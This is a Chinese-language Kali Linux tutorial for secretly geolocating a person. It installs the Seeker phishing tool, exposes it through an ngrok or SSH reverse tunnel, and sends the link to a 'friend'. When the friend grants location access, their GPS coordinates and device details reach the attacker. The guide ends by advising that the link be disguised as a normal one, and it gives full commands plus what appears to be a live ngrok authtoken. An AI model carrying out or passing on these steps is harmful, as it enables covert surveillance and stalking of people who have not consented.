kali精准定位地理位置

物理位置定位：根据IP的定位不准确，容易被欺骗，网上有很多IP伪造技术，所以定位肯定也不准确。

GPS****全球定位系统：（使用最广泛）

GPS是英文Global Positioning System(全球定位系统)的简称。GPS起始于1958年美国军方的一个项目，1964年投入使用。

全球定位系统，大家比较熟悉的就是GPS。除了美国以外，世界其他经济体也有自己的定位系统比如：欧州-伽利略，俄罗斯-格洛纳斯，中国-北斗导航

民用用途：地址勘探，航空航海定位手机设备都支持定位服务很多网站，App也要求定位信息：滴滴/饿了么/导航等

二、定位工具：seeker

Seeker****是一款可以获取高精度地理和设备信息的工具。同时也是社交工程学（社会工程学）爱好者们手中的一款利器。

其利用HTML5，Javascript，JQuery和PHP来抓取设备信息，以及Geolocation接口实现对设备高精度地理位置的获取。

操作系统:kali

所需文件：

链接: https://pan.baidu.com/s/1-hfwKT5vGg5YeZeztzcijQ 密码: ppnc

下载并复制seeker和ngrok这两个压缩包到kali的root目录下。

解压：

unzip seeker-master.zip

进入目录：

cd seeker-master/
ls

看一下seeker都运行什么脚本命令：

mousepad install.sh 

进行安装：

./install.sh

赋予权限：

chmod 777 template/nearyou/php/info.txt
chmod 777 template/nearyou/php/result.txt

打开工具：

python3 seeker.py -t manual

选择1

输入要跳转的链接例如百度：https:www.baidu.com

三、反向代理：ngrok

（https://ngrok.com/download）

**ngrok **是一个反向代理，通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量，便于后期分析和重放。

反向代理在计算机网络中是代理服务器的一种。服务器根据客户端的请求，从其关系的一组或多组后端服务器（如Web服务器）上获取资源，然后再将这些资源返回给客户端，客户端只会得知反向代理的IP地址，而不知道在代理服务器后面的服务器集群的存在。

新建一个终端解压：ngrok-stable-linux-amd64.zip

unzip ngrok-stable-linux-amd64.zip

https://dashboard.ngrok.com/get-started/setup(进入网站注册一个ngrok账户)

注册好后，登陆-进入主页面

通过他给的命令来连接账户

./ngrok authtoken 23oJBg67omUKBIg58Z6SaGh2Ax2_31M37Z6AuCcd6cgL19xC1

运行：

./ngrok http 8080

注意：也可以开启kali本地隧道代替ngrok

ssh -R 80:localhost:8080 [email protected]

最后一行是网址是要转发的链接

四、实战：获取目标地理位置

1.复制链接转发给朋友

2.朋友点击链接获取到手机基本信和地理位置

点击始终允许位置信息将被获取到

手机基本信息和地理位置被kali获取。

城市显示可能不太准确，但是经纬度相对精准。

复制经纬度到谷歌地图进行查询

伪装成正常链接再发给朋友